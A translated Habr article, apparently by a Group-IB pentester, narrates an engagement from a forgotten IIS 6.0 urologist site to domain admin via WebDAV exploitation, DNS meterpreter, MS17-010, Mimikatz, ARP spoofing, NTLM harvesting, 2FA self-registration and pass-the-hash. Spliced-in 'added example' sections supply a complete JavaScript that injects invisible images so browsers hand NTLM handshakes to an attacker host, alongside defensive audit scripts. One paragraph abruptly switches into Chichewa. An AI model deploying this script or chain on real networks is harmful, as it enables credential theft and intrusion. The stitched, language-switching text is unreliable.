Once Upon a Pentest, or How to Break Everything with the Help of a Urologist and Roskomnadzor

This article is based on a very successful pentest that Group-IB specialists carried out a couple of years ago: a story unfolded that could be adapted into a Bollywood film. Now, probably, the reader's reaction will follow: "Oh, another PR piece, these guys are painted as heroes again, don't forget to buy a pentest." Well, on the one hand, it is. However, there are several other reasons why this article appeared. I wanted to show what exactly pentesters do, how interesting and non-trivial this work can be, what curious circumstances can arise in projects, and most importantly, to show live material with real examples.

To restore the balance of modesty in the world, after a while we will write about a pentest that did not go well. We will show how well-designed processes in a company can protect against a whole range of attacks, even well-prepared ones, simply because those processes exist and actually work.

For the client in this story, everything was in very good shape, better than at least 95% of the Russian market by our estimate, but there were a few small nuances that formed a long chain of events, which first led to a long project report and then to this article.

So, stock up on popcorn, and welcome to the detective story. The floor goes to Pavel Suprunyuk, technical manager of the Audit and Consulting department at Group-IB.

Part 1. Doctor Pochkin

2018. There is a client, a high-tech IT company that itself serves many customers. It wants an answer to one question: is it possible, without any prior knowledge or access, working over the Internet, to obtain Active Directory domain administrator rights? No interest in social engineering (oh, but in vain), no intention to disrupt operations deliberately, though that may happen by accident: rebooting a strangely behaving server, for example. An additional goal is to identify as many other attack vectors against the external perimeter as possible. The company runs such tests regularly, and now the deadline for a new one has come. The conditions are almost typical, adequate, understandable. Let's begin.

There is a client name, let it be "Company", and a main website www.company.ru. Of course, the client is called something else, but in this article everything will be depersonalized.
I do network reconnaissance: find out which addresses and domains are registered to the client, draw a network map, see how services are distributed across those addresses. I get the result: more than 4000 live IP addresses. I look at the domains in these networks: fortunately, the vast majority are networks intended for the client's customers, and we are not interested in them. The client thinks the same.

One network of 256 addresses remains, for which by this point there is already an understanding of how domains and subdomains map to IP addresses, and there is information about scanned ports, so the services can be looked through for interesting ones. In parallel, all kinds of scanners are launched against the available IP addresses and, separately, against the websites.

There are many services. Usually this is a joy for a pentester, with the expectation of a quick win: the more services, the larger the attack surface and the easier it is to find an artifact. A quick look at the websites showed that most of them are web interfaces of well-known products from large global companies, which by all appearances tell you that you are not welcome. They ask for a login and password, wave a second-factor field at you, ask for a TLS client certificate, or redirect to Microsoft ADFS. Some are simply unreachable from the Internet. For others, you obviously need a special paid client costing three salaries, or you need to know the exact URL to get in. Let's skip another week of gradual despondency spent trying to "break through" software versions with known vulnerabilities, searching for hidden content in web paths and for leaked accounts from third-party services like LinkedIn, trying to guess passwords with them, and digging for vulnerabilities in self-written websites (by the way, according to statistics this is the most promising external attack vector today). Let me point out right away the gun on the wall that fired later.

So, two sites that stood out from hundreds of services were found. These sites had one thing in common: if you do not do painstaking network reconnaissance by domains but look head-on for open ports or point a vulnerability scanner at a known IP range, these sites fall outside the scan and are simply not visible without knowing the DNS name. Perhaps they had been missed before; at least our automated tools found no problems with them even when pointed directly at the resources.

By the way, about what the scanners that had been run found in general. Let me remind you: for some people, "pentest" equals "automated scan". But the scanners on this project said nothing. Well, the maximum was Medium vulnerabilities (3 out of 5 on the severity scale): a bad TLS certificate or outdated cipher suites on some service, and Clickjacking on most sites. But these will not get you to the goal. Perhaps scanners would have been more useful here, but let me remind you: the client can buy such programs themselves and test themselves with them, and, judging by the bleak results, they already had.

Let's return to the "anomalous" sites. The first is something like a local Wiki at a non-standard address, but in this article let it be wiki.company[.]ru. It also immediately asked for a login and password, but via NTLM in the browser. For the user this looks like an austere window asking for a username and password. And this is bad practice.

A small note. NTLM on perimeter websites is bad for several reasons. First, the Active Directory domain name is disclosed. In our example it also turned out to be company.ru, the same as the "external" DNS name. Knowing this, you can carefully prepare something malicious so that it runs only on the organization's domain-joined machines and not in a sandbox. Second, authentication goes directly through the domain controller via NTLM (surprising, isn't it?), with all the features of the "internal" network policies, including account lockout after the number of password attempts is exceeded. If an attacker learns the logins, they will try passwords against them. If lockout on wrong passwords is configured, it will trigger and the account will be locked. Third, it is impossible to add a second factor to such authentication. If any reader does know how, please let me know, it is genuinely interesting. Fourth, vulnerability to pass-the-hash attacks. ADFS was invented, among other things, to protect against all of this.

There is one bad property of Microsoft products: even if you did not deliberately publish such an NTLM endpoint, it is enabled by default in OWA and Lync, at least.

By the way, the author of this article once accidentally locked about 1000 employee accounts of one large bank within an hour using this very method, and then looked rather pale. The bank's IT services were also pale, but everything ended well and adequately; we were even praised for being the first to find this problem and to provoke a quick and decisive fix.

The second site had an address of the form "obviously-some-surname.company.ru". I found it through Google, somewhere around page 10. The design was from the early 2000s, and a respectable person looked out from the main page, something like this:

[Screenshot]
Here I took a frame from "Heart of a Dog", but believe me, it was vaguely similar, even the color scheme was close. Let the site be called preobrazhensky.company.ru.

It was the personal site... of a urologist. I wondered what a urologist's site was doing on a subdomain of a high-tech company. A quick dig in Google showed that this doctor was a co-founder of one of our client's legal entities and had even contributed about 1000 rubles to its charter capital. The site had probably been created many years ago, and the client's server resources were used as hosting. The site had long lost its relevance, but for some reason it was left running for a long time.

In terms of vulnerabilities the site was secure. Looking ahead, I will say that it was a set of static information: simple html pages with illustrations in the form of kidneys and bladders. It is useless to "break" such a site.

But the web server underneath was much more interesting. Judging by the HTTP Server header, it was IIS 6.0, which means it ran Windows 2003 as the operating system. The scanner had already flagged that this urologist's site, unlike the other virtual hosts on the same web server, responded to the PROPFIND method, meaning WebDAV was running. By the way, the scanner reported this with the Info mark (in scanner-report language, the lowest danger level); such things are usually simply skipped. In combination this gave an interesting effect, revealed only after another dig in Google: a rare buffer overflow vulnerability associated with the Shadow Brokers set, namely CVE-2017-7269, which had been public for a year by then. In other words, there will be trouble if you have Windows 2003 and WebDAV running on IIS. Although running Windows 2003 in production in 2018 is a problem in itself.

The exploit ended up in Metasploit and was immediately tested with a payload that sent a DNS request to a controlled service; Burp Collaborator is traditionally used to catch DNS requests. To my surprise, it worked the first time: the DNS knock was received. Next there was an attempt to create a backconnect over port 80 (that is, a network connection from the server to the attacker, with access to cmd.exe on the victim host), but it was a fiasco. The connection never came, and after the third attempt to exploit it, the site, along with all its interesting pictures, disappeared forever.

Usually this is followed by a letter of the kind "client, wake up, we've dropped everything." But we were told that the site had nothing to do with business processes and was running there for no reason at all, like the whole server, and that we could use this resource as we wished.
About a day later the site suddenly came back to life by itself. Having built a test bench with WebDAV on IIS 6.0, I found that the default settings restart IIS worker processes every 30 hours. That is, as soon as control left the shellcode, the IIS worker process died, restarted itself a couple of times and then went to rest for 30 hours.

Since the tcp backconnect failed the first time, I attributed the problem to a closed port. That is, I assumed some firewall that did not let outgoing connections out. I started running shellcodes that probed many tcp and udp ports; no result. Reverse connections over http(s) from Metasploit, meterpreter/reverse_http(s), did not work either. Suddenly a connection to that same port 80 was established, but it dropped immediately. I attributed this to a still-hypothetical IPS that did not like meterpreter traffic. Given that a plain tcp connection to port 80 did not get through but an http connection did, I concluded that an http proxy was configured somewhere along the way.

I even tried meterpreter over DNS (thanks d00kie for your efforts, it has saved many projects), remembering the very first success, but it did not work even on the bench: the shellcode was too big for this vulnerability.

In reality it looked like this: 3-4 attack attempts within 5 minutes, then a 30-hour wait. And so on for three weeks in a row. I even set a reminder so as not to waste time. On top of that, there was a difference in behavior between the test and production environments: for this vulnerability there were two similar exploits, one from Metasploit and a second from the Internet, converted from the Shadow Brokers version. So only the Metasploit one was tested in combat, and only the second one on the bench, which made debugging even harder and broke my brain.

In the end, a shellcode that downloaded an exe file from a given server over http and launched it on the target system proved effective. The shellcode was small enough to fit, and it worked. Since the server did not like plain TCP traffic at all and http(s) was inspected for meterpreter, I decided that the fastest way was to download, through this shellcode, an exe file containing the DNS meterpreter.

Again a problem arose: when downloading the exe file, and, as attempts showed, whatever it was, the download was cut off. Again, some security device between my server and the urologist did not like http traffic with an exe inside. The "quick" solution appeared to be modifying the shellcode so that it obfuscated the http traffic on the fly, so that abstract binary data was transferred instead of an exe. Finally, the attack succeeded and control was obtained over the thin DNS channel:

[Screenshot]
It immediately became clear that I had the rights of a basic IIS worker, which let me do nothing. This is what it looked like in the Metasploit console:

[Screenshot]
All pentest methodologies insist that you should escalate privileges once you gain access. I usually do not do this locally, since the very first access is viewed simply as an entry point into the network, and compromising another machine on the same network is usually easier and faster than escalating privileges on the one already in hand. But that is not the case here, since the DNS channel is very narrow and will not carry traffic.

Assuming this Windows 2003 server had not been patched for the famous MS17-010 vulnerability, I tunnel traffic to port 445/TCP through the meterpreter DNS tunnel to localhost (yes, that is possible too) and try to run the previously downloaded exe through the vulnerability. The attack works, I get a second connection, this time with SYSTEM rights.

[Screenshot]

It is funny that they still tried to protect the server against MS17-010: the vulnerable network services were disabled on the external interface. That protects against attacks over the network, but the attack from inside via localhost worked, since you cannot just quickly disable SMB on localhost.

Next, interesting details emerged:

  1. With SYSTEM rights, you can easily establish a connection over TCP. Obviously direct TCP was a problem only for the limited IIS user. Spoiler: the IIS user's traffic was somehow wrapped into the local ISA Proxy in both directions. Exactly how that worked, I did not reproduce.
  2. I am in some kind of "DMZ" (and this is not an Active Directory domain but a WORKGROUP), which sounds logical. But instead of the expected private ("gray") IP address, I have a completely "white" IP address, exactly the one I attacked earlier. This means the company is so old in the world of IPv4 addressing that it can afford to hold a DMZ segment of 128 "white" addresses without NAT, according to the scheme drawn in Cisco manuals from 2005.

Since the server is old, Mimikatz is guaranteed to work straight from memory:

[Screenshot]
I get the local administrator's password, tunnel RDP over TCP and log into a cozy desktop. Since I could do whatever I wanted with the server, I removed the antivirus and found that the server was reachable from the Internet only on TCP ports 80 and 443, and 443 was not in use. I set up an OpenVPN server on 443, added NAT for my VPN traffic and got direct, unrestricted access to the DMZ network through my OpenVPN. It is notable that ISA, having some IPS functions that could not be disabled, blocked my traffic along with port scanning, so it had to be replaced with the simpler and more compliant RRAS. So pentesters sometimes still have to administer all sorts of things.

[Screenshot]
An attentive reader will ask: "What about the second site, the wiki with NTLM authentication, about which so much was written?" More on that later.

Part 2. Not encrypting? Then we're already on our way to you

So, there is access to a DMZ network segment. We need to get to domain administrator. The first thing that comes to mind is to automatically check the security of the services inside the DMZ segment, especially since many more of them are now open for research. A typical picture in penetration testing: the external perimeter is protected better than internal services, and once you gain any access inside a large infrastructure, it is much easier to gain extended rights in the domain, firstly because the domain becomes reachable by tools, and secondly because in an infrastructure with several thousand hosts there will always be a couple of critical problems.

I launch scanners into the DMZ through the OpenVPN channel and wait. I open the report: again nothing serious, apparently someone had gone this way before me. The next step is to study how hosts inside the DMZ network communicate. To do that, first start plain Wireshark and listen to broadcast requests, primarily ARP. ARP packets were collected all day. It turned out that several gateways are used in this segment. This would come in handy later. By combining the data from ARP requests and responses with the port scan data, I found the exit points of user traffic from inside the local network, in addition to the previously known services such as web and mail.

Since at that moment I had no access to other systems and not a single account for corporate services, I decided to fish at least some account out of the traffic using ARP Spoofing.

Cain & Abel was launched on the urologist's server. Taking into account the discovered traffic flows, the most promising pairs for a man-in-the-middle attack were chosen, and then some network traffic was obtained in short runs of 5-10 minutes, with a timer to reboot the server in case of a freeze. As in the joke, there were two pieces of news:

  1. Good: a lot of credentials were caught and the attack as a whole works.
  2. Bad: all the credentials belonged to the client's own customers. While providing support, client specialists connected to their customers' services, which did not always have traffic encryption configured.

As a result, I got a lot of credentials that were useless in the context of the project, but definitely interesting as a demonstration of the danger of the attack. Border routers of large companies with telnet, forwarded http ports to internal CRMs with all their data, direct RDP access from Windows XP on a local network, and other horrors. It turned out to be a Supply Chain Compromise according to the MITRE matrix.

I also found an amusing opportunity to collect emails from the traffic, like this one. This is an example of a ready letter that went from our client to the SMTP port of their customer, again, without encryption. A certain Andrey asks his namesake to resend the documents, and they are uploaded to a cloud drive with login, password and link in one reply:

[Screenshot]
This is yet another reminder to encrypt all services. It is unknown who exactly will read and use your data and when: a provider, a system administrator of another company, or a pentester like this one. I will not even mention that many people can simply intercept unencrypted traffic.

Despite the apparent success, this did not bring us closer to the goal. It was possible, of course, to sit for a long time and fish out valuable information, but there was no guarantee it would appear there, and the attack itself is very risky in terms of network integrity.

After another dig into the services, an interesting idea came to mind. There is a utility called Responder (examples of its use are easy to find by this name) which, by "poisoning" broadcast requests, provokes connections over various protocols such as SMB, HTTP, LDAP and so on, in various forms, then asks everyone who connects to authenticate, and arranges it so that authentication goes over NTLM in a mode transparent to the victim. Most often the attacker collects NetNTLMv2 handshakes this way and recovers users' domain passwords from them with a dictionary. Here I wanted something similar, but the users sat "behind a wall", or rather were separated by a firewall and accessed the WEB through a cluster of Blue Coat proxies.

Remember I mentioned that the Active Directory domain name matched the "external" domain, that is, it was company.ru? So, Windows, more precisely Internet Explorer (and Edge, and Chrome), lets the user authenticate transparently over HTTP via NTLM if it considers the site to be in the "Intranet Zone". One of the signs of "Intranet" is access to a "gray" IP address or to a short DNS name, that is, one without dots. Since they had a server with a "white" IP and the DNS name preobrazhensky.company.ru, and domain-joined machines usually receive the Active Directory domain suffix via DHCP to complete short names, all it took was to type the URL preobrazhensky in the address bar to find the right path to the compromised urologist's server, not forgetting that it now counts as "Intranet". That is, to hand me the user's NTLM handshake without their knowledge. All that remained was to make the clients' browsers think they urgently needed to contact this server.

The wonderful Intercepter-NG utility came to the rescue (thanks, Intercepter). It allowed traffic to be modified on the fly and worked great on Windows 2003. It even had separate functionality for modifying only JavaScript files in the traffic stream. A kind of mass Cross-Site Scripting was planned.

The Blue Coat proxies through which users accessed the global WEB periodically cached static content. From the intercepted traffic it was clear that they worked around the clock, endlessly requesting frequently used static content to speed up content delivery during peak hours. In addition, BlueCoat had a specific User-Agent, which clearly distinguished it from a real user.

A JavaScript was prepared which, using Intercepter-NG, was injected for an hour at night into every response with JS files destined for Blue Coat. The script did the following:

  • Determined the current browser by User-Agent. If it was Internet Explorer, Edge or Chrome, it continued working.
  • Waited until the page DOM was built.
  • Inserted an invisible image into the DOM with an src attribute of the form preobrazhensky:8080/NNNNNNN.png, where NNN are random digits so that BlueCoat would not cache it.
  • Set a global flag variable indicating that the injection was done and there was no need to insert images anymore.

The browser tried to load this image; on port 8080 of the compromised server a TCP tunnel to my laptop was waiting, where the same Responder was running, demanding that the browser log in via NTLM.
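The four steps above, together with the dotless-name Intranet Zone trick from the preceding section, written out as a stand-alone script. This is an added example, not the script used on the engagement (which the article does not publish); the host name preobrazhensky and port 8080 are the article's, the function names, the flag name and the `makeFakeWindow` test double are mine. It is deliberately ES5 (no arrow functions, template literals or `const`), because a script spliced into a cached file has to parse in Internet Explorer too.

```javascript
'use strict';
// Added example (not the engagement's script): beacon injection that makes a
// domain-joined browser send an NTLM handshake to a dotless "Intranet" host.

var BEACON_HOST = 'preobrazhensky';          // dotless name: IE/Edge/Chrome on Windows treat it as Intranet Zone
var BEACON_PORT = 8080;                      // TCP tunnel on the compromised server, forwarded to Responder
var FLAG = '__preobrazhenskyBeaconDone';     // global marker so the beacon fires once per page

// Step 1: only browsers that do silent NTLM for Intranet-Zone hosts are worth touching.
function isTargetBrowser(ua) {
  if (typeof ua !== 'string') return false;
  if (/\bTrident\/|\bMSIE /.test(ua)) return true;      // Internet Explorer
  if (/\bEdge?\//.test(ua)) return true;                  // Edge (EdgeHTML or Chromium)
  return /\bChrome\//.test(ua) && !/\bOPR\//.test(ua);    // Chrome, excluding Opera
}

// Step 3: a random path per hit so the Blue Coat cache never serves the image itself.
function beaconUrl(rand) {
  var n = rand === undefined ? Math.floor(Math.random() * 1e9) : rand;
  return 'http://' + BEACON_HOST + ':' + BEACON_PORT + '/' + n + '.png';
}

// Append a 1x1 invisible <img> whose fetch carries the NTLM handshake.
// Returns true if an image was inserted, false if the page was skipped.
function injectBeacon(win) {
  if (!isTargetBrowser(win.navigator && win.navigator.userAgent)) return false;
  if (win[FLAG]) return false;                             // Step 4: already done on this page
  var img = win.document.createElement('img');
  img.width = 1;
  img.height = 1;
  img.style.position = 'absolute';
  img.style.visibility = 'hidden';
  img.src = beaconUrl();
  win.document.body.appendChild(img);
  win[FLAG] = true;
  return true;
}

// Step 2: body must exist before anything can be appended to it.
function run(win) {
  if (win.document.readyState === 'loading') {
    win.document.addEventListener('DOMContentLoaded', function () { injectBeacon(win); });
  } else {
    injectBeacon(win);
  }
}

// Minimal stand-in for a browser window, used to exercise the logic under Node.
function makeFakeWindow(userAgent) {
  var appended = [];
  return {
    appended: appended,
    navigator: { userAgent: userAgent },
    document: {
      readyState: 'complete',
      createElement: function () { return { style: {} }; },
      body: { appendChild: function (el) { appended.push(el); } }
    }
  };
}

if (typeof window !== 'undefined') {
  run(window);                                              // real browser: fire the beacon
} else if (typeof require !== 'undefined' && require.main === module) {
  var demo = makeFakeWindow('Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko');
  run(demo);
  console.log(demo.appended.map(function (img) { return img.src; }));
}
```

The image request is plain HTTP, so the NTLM exchange it triggers lands on whatever listens behind port 8080; in the article that was a tunnel to Responder. Note that Blue Coat's own cache-refresh requests never run the script, so no filtering of its User-Agent is needed here: the proxy is the delivery vehicle, the users' browsers are the target.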

[Screenshot]
Judging by the Responder logs, people came to work in the morning, turned on their workstations, and then en masse and unnoticed began visiting the urologist's server, not forgetting to "drop" their NTLM handshakes. Handshakes rained down all day and clearly accumulated material for what looked like a sure-fire password recovery attack. This is what the Responder logs looked like:

[Screenshot: users' secret visits to the urologist's server]

You have probably already noticed that this whole story is built on the principle of "everything was fine, but then there was a setback, then the setback was overcome, and then everything came to success." So, there was a setback here too. Of fifty unique handshakes, not a single one was cracked. And this despite the fact that even on a laptop with a feeble processor, NTLMv2 handshakes are processed at a rate of several hundred million attempts per second.

I had to arm myself with password mutation techniques, a graphics card, a thicker dictionary, and wait. After a long time, several accounts with passwords of the form "Q11111111....1111111q" were cracked, which suggests that all users had once been forced to come up with a very long password with mixed character case, which was supposed to be complex. But you cannot fool a seasoned user, and that is how they made it easier to remember. In total, about 5 accounts were compromised, and only one of them had any valuable rights to services.

Part 3. Roskomnadzor strikes back

So, the first domain accounts were obtained. If you have not fallen asleep by this point from the long read, you will probably remember that I mentioned a service that did not require a second authentication factor: the wiki with NTLM authentication. Of course, the first thing to do was log into it. Digging into the internal knowledge base quickly brought results:

  • The company has a WiFi network with authentication using domain accounts, with access to the local network. With the current data set this is already a working attack vector, but you have to go to the office on foot and be somewhere on the client's office premises.
  • I found instructions according to which there was a service that allowed... self-registering a "second factor" authentication device if the user is inside the local network and confidently remembers their login and password. In this case "inside" and "outside" were determined by whether the service's port was reachable by the user. The port was not reachable from the Internet, but it was perfectly reachable via the DMZ.

Of course, a "second factor" was immediately added to the compromised account in the form of an application on my phone. There was a program that could either loudly send a push request to the phone with "approve"/"deny" buttons for an action, or silently show an OTP code on the screen for subsequent manual entry. Moreover, according to the instructions the first method was supposed to be the only correct one, but it did not work, unlike the OTP method.

With the "second factor" broken, I was able to get into Outlook Web Access mail and into remote access via Citrix Netscaler Gateway. There was a surprise in the mail in Outlook:

[Screenshot: in this rare shot you can see how Roskomnadzor helps pentesters]

These were the first months after the famous "carpet" blocking of Telegram, when entire networks with thousands of addresses were irrevocably disappearing from reach. It became clear why push did not work right away, and why my "victim" did not raise the alarm when their account started being used openly.

Anyone familiar with Citrix Netscaler knows that it is usually deployed so that only a picture can be delivered to the user, trying not to give them tools for launching third-party applications and transferring data, and restricting in every possible way access through standard command shells. My "victim", by virtue of their duties, got only 1C:

[Screenshot]
Having walked around the 1C interface a bit, I found that there were external processing modules. They can be loaded from the interface and are executed on the client or on the server, depending on rights and settings.

I asked my friends who program in 1C to create a processing module that would accept a string and execute it. In the 1C language, launching a process looks roughly like this (taken from the Internet). Do you agree that the syntax of the 1C language strikes a Russian speaker with its fluency?

[Screenshot]

The processing module executed perfectly; it turned out to be what pentesters call a "shell": Internet Explorer was launched through it.

[Screenshot]
Earlier, the address of the system for ordering passes to the premises had been found in the mail. I ordered a pass in case I had to use the WiFi vector.

[Screenshot]
There is talk on the Internet that the client's office no longer has free tasty food anyway, but I still preferred to develop the attack remotely; it is calmer.

AppLocker was enabled on the application server running Citrix, but it was bypassed. The same Meterpreter was uploaded and launched over DNS, since the http(s) versions refused to connect and I did not know the internal proxy address at the time. By the way, from this moment the external pentest essentially turned into an internal one.

Part 4. Admin rights for users are bad, right?

The first task of a pentester after gaining control of a user's domain session is to collect all information about rights in the domain. There is the BloodHound utility, which can automatically download information about users, computers and security groups over LDAP from the domain controller, and over SMB, information about who has recently logged in where and who is a local administrator.

Njira yodziwikiratu yolanda ufulu wa oyang'anira domeni imawoneka yosavuta ngati kachitidwe kosokoneza:

  • Timapita kumakompyuta omwe ali ndi ufulu woyang'anira dera, kutengera maakaunti omwe adagwidwa kale.
  • Timakhazikitsa Mimikatz ndikupeza mawu achinsinsi osungidwa, matikiti a Kerberos ndi ma hashes a NTLM a ma domain account omwe adalowa mudongosolo lino. Kapena timachotsa chithunzi cha lsass.exe ndikuchita zomwezo kumbali yathu. Izi zimagwira ntchito bwino ndi Windows yocheperapo 2012R2/Windows 8.1 yokhala ndi zosintha zosasintha.
  • Timazindikira komwe maakaunti osokonezedwa ali ndi ufulu woyang'anira. Timabwereza mfundo yoyamba. Nthawi zina timapeza ufulu woyang'anira dera lonselo.

"Mapeto a Cycle;", monga olemba mapulogalamu a 1C angalembe apa.
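The loop above is a walk over a graph whose nodes are principals and computers, and the same walk is what a defender runs over their own directory data to find which cached session or local-admin right to remove. The following is an added example (my code, not BloodHound's and not from the original article) with a constructed set of AdminTo/HasSession/MemberOf edges in the spirit of the relationships the text describes; every account, group and host name is hypothetical.

```python
from collections import defaultdict, deque

# Constructed directory relationships (hypothetical names):
#   AdminTo    - the principal is a local administrator on the computer
#   HasSession - the user's credentials are in memory on that computer
#   MemberOf   - group membership
EDGES = [
    ("alice@corp.example", "AdminTo", "VDI-017.corp.example"),
    ("VDI-017.corp.example", "HasSession", "helpdesk-op@corp.example"),
    ("helpdesk-op@corp.example", "MemberOf", "HELPDESK@corp.example"),
    ("HELPDESK@corp.example", "AdminTo", "SRV-FILE01.corp.example"),
    ("SRV-FILE01.corp.example", "HasSession", "backup-svc@corp.example"),
    ("backup-svc@corp.example", "MemberOf", "DOMAIN ADMINS@corp.example"),
    ("bob@corp.example", "AdminTo", "WS-042.corp.example"),
    ("WS-042.corp.example", "HasSession", "bob@corp.example"),
]

DOMAIN_ADMINS = "DOMAIN ADMINS@corp.example"


def build_graph(edges):
    """Adjacency list: node -> [(relationship, neighbour), ...]."""
    graph = defaultdict(list)
    for src, rel, dst in edges:
        graph[src].append((rel, dst))
    return graph


def shortest_path(edges, start, target):
    """Breadth-first search from start to target. Returns the path as a list of
    (src, rel, dst) edges, or None when target is unreachable from start."""
    graph = build_graph(edges)
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            path = []
            while prev[node] is not None:
                src, rel = prev[node]
                path.append((src, rel, node))
                node = src
            return path[::-1]
        for rel, dst in graph.get(node, []):
            if dst not in prev:
                prev[dst] = (node, rel)
                queue.append(dst)
    return None


def credential_exposures(path):
    """The HasSession edges on a path: each is a host where a more privileged
    user's credentials sit in memory while a lesser account administers it.
    Clearing any one of them (or removing the admin right before it) breaks the path."""
    return [edge for edge in path if edge[1] == "HasSession"]


if __name__ == "__main__":
    path = shortest_path(EDGES, "alice@corp.example", DOMAIN_ADMINS)
    for src, rel, dst in path:
        print(f"{src} -[{rel}]-> {dst}")
    print("sessions to clear:", credential_exposures(path))
```

In the constructed data, alice reaches Domain Admins in six hops through two cached sessions, while bob's only admin right leads back to himself. For the real directory, the two exposures flagged are exactly the places the fixes at the end of the article apply: privileged accounts should not log on interactively to hosts that ordinary users administer, and where they must, Protected Users membership and Credential Guard keep reusable secrets out of lsass.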

So, our user turned out to be an administrator on one host running Windows 7 whose name contained the word "VDI", as in "Virtual Desktop Infrastructure", a personal virtual machine. The designer of the VDI service probably reasoned that since a VDI is a user's personal operating system, the user may change the software environment however they like and the host can always be "re-rolled". I also thought the idea was good, went to this personal VDI host and built a nest there:

  • I installed an OpenVPN client on it, which made a tunnel over the Internet to my server. The client had to be pushed through that same Blue Coat with domain authentication, but OpenVPN does this, as they say, "out of the box".
  • I installed OpenSSH on the VDI. Well, really, what is Windows 7 without SSH?

This is what it looked like live. Let me remind you that all of this has to be done through Citrix and 1C:

One of the techniques for gaining access to neighbouring computers is checking local administrator passwords for matches. Here luck was waiting right away: the NTLM hash of the default local administrator (who was, suddenly, named Administrator) worked via a pass-the-hash attack against the neighbouring VDI hosts, of which there were several hundred. Naturally, the attack landed on them immediately.

This is where the VDI administrators shot themselves in the foot twice:

  • The first time was when the VDI machines were not brought under LAPS, that is, the same local administrator password from the image was kept on every VDI it was mass-deployed to.
  • The default Administrator is the only local account vulnerable to a pass-the-hash attack. Even with an identical password, the mass compromise could have been avoided by creating a second local administrator account with a complex random password and disabling the default one.
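Both mistakes in the list above can be caught by an inventory check long before a pentester finds them. As an added example (my code, not the article's and not any vendor's tool), the script below takes a constructed host inventory carrying, per host, a fingerprint of the local Administrator credential, its LAPS status and whether the built-in account is enabled, and reports which hosts share one credential while leaving the built-in Administrator enabled outside LAPS. The field names and the HASH_* placeholder values are assumptions; a real run would feed it an export from the endpoint-management or LAPS audit tooling. The reason the text singles out the built-in account is that Windows' UAC remote restrictions exempt the RID-500 Administrator, so its network logon yields a full token while other local administrators get a filtered one by default.

```python
from collections import defaultdict

# Constructed host inventory (hypothetical export from endpoint management).
# "admin_hash" is a placeholder fingerprint of the local Administrator
# credential; identical values mean identical passwords.
HOSTS = [
    {"host": "VDI-001", "laps_managed": False, "builtin_admin_enabled": True, "admin_hash": "HASH_IMAGE_A"},
    {"host": "VDI-002", "laps_managed": False, "builtin_admin_enabled": True, "admin_hash": "HASH_IMAGE_A"},
    {"host": "VDI-003", "laps_managed": False, "builtin_admin_enabled": True, "admin_hash": "HASH_IMAGE_A"},
    {"host": "VDI-004", "laps_managed": True, "builtin_admin_enabled": False, "admin_hash": "HASH_UNIQUE_1"},
    {"host": "SRV-APP01", "laps_managed": True, "builtin_admin_enabled": True, "admin_hash": "HASH_UNIQUE_2"},
    {"host": "WS-100", "laps_managed": False, "builtin_admin_enabled": False, "admin_hash": "HASH_IMAGE_B"},
    {"host": "WS-101", "laps_managed": False, "builtin_admin_enabled": False, "admin_hash": "HASH_IMAGE_B"},
]


def shared_credential_clusters(hosts, min_size=2):
    """Map each credential fingerprint to the hosts that share it (clusters of
    size >= min_size only). Any cluster is a password-reuse finding in itself."""
    by_hash = defaultdict(list)
    for h in hosts:
        by_hash[h["admin_hash"]].append(h["host"])
    return {k: sorted(v) for k, v in by_hash.items() if len(v) >= min_size}


def pass_the_hash_exposure(hosts):
    """Hosts where one captured hash would grant admin on others: built-in
    Administrator enabled, not under LAPS, and credential shared with at least
    one other host. This is the VDI situation described in the text."""
    clusters = shared_credential_clusters(hosts)
    return sorted(
        h["host"]
        for h in hosts
        if h["builtin_admin_enabled"] and not h["laps_managed"] and h["admin_hash"] in clusters
    )


def laps_gaps(hosts):
    """Hosts whose local admin password is not rotated by LAPS at all."""
    return sorted(h["host"] for h in hosts if not h["laps_managed"])


if __name__ == "__main__":
    print("shared credentials:", shared_credential_clusters(HOSTS))
    print("pass-the-hash exposure:", pass_the_hash_exposure(HOSTS))
    print("not under LAPS:", laps_gaps(HOSTS))
```

On the constructed inventory the three VDI hosts built from image A are the lateral-movement cluster; WS-100 and WS-101 still reuse a password and belong in the LAPS gap list, but with the built-in account disabled a single captured hash does not fan out across them. Running such a check after every image rollout is the cheap way to enforce the "no shared passwords" rule from the list at the end of the article.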

Why is there an SSH service on that Windows? Very simple: the OpenSSH server now provided not only a convenient interactive shell that did not interfere with the user's work, but also a socks5 proxy on the VDI. Through this socks proxy I connected over SMB and collected cached accounts from all these hundreds of VDI machines, then searched the BloodHound graphs for a path to domain admin using them. With hundreds of hosts in hand, I found that path quite quickly. Domain administrator rights obtained.

Here is a picture from the Internet showing a similar search. The links show who is an administrator where and who is logged in where.

By the way, remember the condition from the very beginning of the project: "do not use social engineering". So I suggest pondering how much of this Bollywood with special effects would have been cut out if it had been possible to use banal phishing. But personally, doing all this was very interesting for me. I hope you enjoyed reading it. Of course, not every project looks this intriguing, but the work as a whole is very demanding and does not let you stagnate.

Perhaps someone will have a question: how do you protect yourself? Although this article describes many techniques, many of which Windows administrators are not even aware of, I suggest looking at them from the point of view of banal principles and information security measures:

  • do not use outdated software (remember Windows 2003 at the beginning?)
  • do not keep unnecessary systems running (why was there a urologist's website?)
  • check your users' passwords for strength yourself (otherwise soldiers... pentesters will do it for you)
  • do not use the same password in different accounts (the VDI compromise)
  • and so on

Of course, this is very hard to achieve, but in the next article we will show in practice that it is quite possible.

Source: www.habr.com
